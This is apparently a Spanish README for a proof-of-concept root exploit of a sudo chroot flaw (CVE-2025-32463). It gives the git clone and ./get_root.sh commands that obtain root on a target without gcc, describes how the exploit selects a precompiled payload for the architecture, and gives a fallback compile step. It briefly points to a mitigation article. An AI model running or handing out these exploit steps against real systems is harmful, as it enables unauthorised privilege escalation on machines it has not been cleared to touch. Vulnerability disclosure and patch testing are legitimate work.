
Escalada de privilegios a root usando sudo chroot, NO NECESITA gcc instalado.
Escalada de privilegios a root mediante sudo, SIN NECESIDAD de que gcc esté instalado en el objetivo.
Descubierto por Rich Mirch.
He escrito un artículo explicando la mitigación del ataque aquí: Ubuntu Unattended-Upgrades
# get_root.sh and get_root.py do the same thing.
git clone https://github.com/MohamedKarrab/CVE-2025-32463.git
cd CVE-2025-32463
./get_root.sh
No se requiere gcc en la máquina objetivo. El PoC funciona verificando la arquitectura actual (p. ej., x86_64, aarch64), luego ejecuta la carga útil precompilada dinámicamente correspondiente. Si falla, recurre a la estática.
Si el exploit falla en tu máquina, aún puedes compilarlo usando:
./mkall-dynamic.sh
# then run
./get_root.sh
Pero obviamente necesitarás un compilador en este punto.